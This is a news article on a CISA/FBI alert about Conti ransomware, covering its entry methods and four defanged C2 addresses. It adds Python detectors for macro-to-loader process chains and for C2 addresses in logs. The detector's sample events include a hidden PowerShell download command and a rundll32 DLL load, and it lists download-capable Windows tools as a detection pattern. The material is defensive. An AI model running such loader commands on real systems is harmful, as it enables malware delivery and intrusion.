
US issues alert on Conti ransomware activity

Earlier this week the US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued an alert on the increased use of Conti ransomware.

The agencies revealed they had seen more than 400 attacks on US and international organisations, with actors gaining initial access to networks via spear phishing emails, fake software downloads and malicious Microsoft Word documents that contain malware.

Conti is considered a ransomware-as-a-service (RaaS) operation, but the agencies note that it differs from the usual RaaS model: the developers are reported to pay the deployers of the ransomware a wage rather than a percentage of the proceeds from ransom payments.

Conti actors often gain initial access to networks through:

  • Spearphishing campaigns using tailored emails that contain malicious attachments or malicious links;
    • Malicious Word attachments often contain embedded scripts that can be used to download or drop other malware, such as TrickBot and IcedID and/or Cobalt Strike, to assist with lateral movement and later stages of the attack life cycle, with the eventual goal of deploying Conti ransomware.
  • Stolen or weak Remote Desktop Protocol (RDP) credentials;
  • Phone calls;
  • Fake software promoted via search engine optimization;
  • Other malware distribution networks (e.g., ZLoader); and
  • Common vulnerabilities in external assets.
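As an added example (not code from the alert or from this article), the following Python heuristic flags the macro-to-loader hand-off described in the Word attachment bullet: an Office application spawning a script host or a download-capable Windows binary. The event field names imitate Sysmon process-creation events, and the process lists and sample events are assumptions constructed for the demo, not indicators taken from the alert.

```python
# Added example, not from the CISA/FBI alert or this article: a heuristic
# check for the macro-laden Word attachment vector described above, run
# over constructed process-creation events. The field names imitate Sysmon
# Event ID 1 (ProcessCreate) but are an assumption; map them to your own
# telemetry schema.
from dataclasses import dataclass
from typing import List

# Office applications that open the lure document.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Script hosts and download-capable Windows binaries that an embedded
# script typically hands off to. Assumption: a generic list, not one the
# alert enumerates.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "msiexec.exe",
}


@dataclass
class ProcessEvent:
    event_id: int
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Case-insensitive file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_suspicious_office_child(ev: ProcessEvent) -> bool:
    """True when an Office app spawns a script host or download tool."""
    return (_basename(ev.parent_image) in OFFICE_PARENTS
            and _basename(ev.image) in SUSPICIOUS_CHILDREN)


def flag_events(events: List[ProcessEvent]) -> List[int]:
    """Return the event_ids the heuristic flags, in input order."""
    return [ev.event_id for ev in events if is_suspicious_office_child(ev)]


# Constructed sample telemetry (not real incident data).
OFFICE16 = r"C:\Program Files\Microsoft Office\root\Office16"
SAMPLE_EVENTS = [
    # Word handing off to cmd.exe, which launches a hidden PowerShell
    # downloader: the classic macro-to-loader chain. Flagged.
    ProcessEvent(1, OFFICE16 + r"\WINWORD.EXE", r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c powershell -w hidden -c "iwr http://example.invalid/a"'),
    # cmd.exe from Explorer: an operator at a console, not a macro. Not flagged.
    ProcessEvent(2, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe"),
    # Word launching its 64-bit print helper: a legitimate child, must not fire.
    ProcessEvent(3, OFFICE16 + r"\WINWORD.EXE", r"C:\Windows\splwow64.exe",
                 "splwow64.exe 12288"),
    # Excel loading a dropped DLL through rundll32. Flagged.
    ProcessEvent(4, OFFICE16 + r"\EXCEL.EXE", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\Public\update.dll,Start"),
]


if __name__ == "__main__":
    for eid in flag_events(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[eid - 1]
        print(f"event {eid}: {_basename(ev.parent_image)} -> "
              f"{_basename(ev.image)}: {ev.command_line}")
```

The parent/child pair is the signal; the command line is kept only for the analyst. Expect some tuning in environments where add-ins legitimately launch script hosts from Office, and treat the benign splwow64.exe case as a reminder that "any child of Word" is too broad a rule.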

Artifacts leaked with the Conti playbook referenced in the alert identify four IP addresses of Cobalt Strike servers that Conti actors previously used for command and control (C2) communications:

  • 162.244.80[.]235
  • 85.93.88[.]165
  • 185.141.63[.]120
  • 82.118.21[.]1
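The following Python is added here and is not part of the alert or the article: it refangs the four published addresses, validates them, and scans constructed firewall, proxy and DNS log lines for exact matches. The log format and the log lines are assumptions made for the demo.

```python
# Added example, not from the CISA/FBI alert or this article: refang the
# four published Cobalt Strike addresses and look for them in firewall,
# proxy and DNS logs. The log lines below are constructed for the demo.
import ipaddress
import re
from typing import Dict, Iterable, List, Set

# The four addresses exactly as published (defanged with "[.]").
CONTI_C2_IOCS_DEFANGED = [
    "162.244.80[.]235",
    "85.93.88[.]165",
    "185.141.63[.]120",
    "82.118.21[.]1",
]


def refang(ioc: str) -> str:
    """Undo the common defanging conventions so the value can be matched."""
    return ioc.replace("[.]", ".").replace("(.)", ".").replace("[dot]", ".")


def load_iocs(defanged: Iterable[str]) -> Set[str]:
    """Refang and validate; a malformed entry raises ValueError rather than
    silently becoming an indicator that can never match."""
    return {str(ipaddress.ip_address(refang(x))) for x in defanged}


# Word boundaries stop "185.141.63.12" or "185.141.63.1200" from matching
# the indicator 185.141.63.120 as a substring.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def find_ioc_hits(log_lines: Iterable[str], iocs: Set[str]) -> List[Dict[str, object]]:
    """Return one record per indicator occurrence, with the 1-based line number."""
    hits: List[Dict[str, object]] = []
    for n, line in enumerate(log_lines, 1):
        for ip in IPV4_RE.findall(line):
            if ip in iocs:
                hits.append({"line": n, "ip": ip, "text": line.strip()})
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    "2021-09-22T10:01:02Z fw allow src=10.20.30.40 dst=93.184.216.34 dport=443",
    "2021-09-22T10:01:09Z fw allow src=10.20.30.40 dst=162.244.80.235 dport=443",
    "2021-09-22T10:02:15Z fw allow src=10.20.30.41 dst=185.141.63.12 dport=80",
    "2021-09-22T10:03:44Z proxy CONNECT 82.118.21.1:8080 user=jsmith",
    "2021-09-22T10:04:01Z dns query=updates.example.invalid answer=85.93.88.165",
]


if __name__ == "__main__":
    for hit in find_ioc_hits(SAMPLE_LOG, load_iocs(CONTI_C2_IOCS_DEFANGED)):
        print(f"line {hit['line']}: {hit['ip']}  <- {hit['text']}")
```

The third sample line is a near-miss (185.141.63.12) and must not fire; a plain substring search would match it against 185.141.63.120. Because the alert describes these addresses as previously used, a hit is a lead to investigate, not proof of compromise, and any block rule should be reviewed periodically in case the addresses have since been reassigned.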

Duncan

Duncan is a technology professional with over 20 years' experience of working in various IT roles. He has an interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.
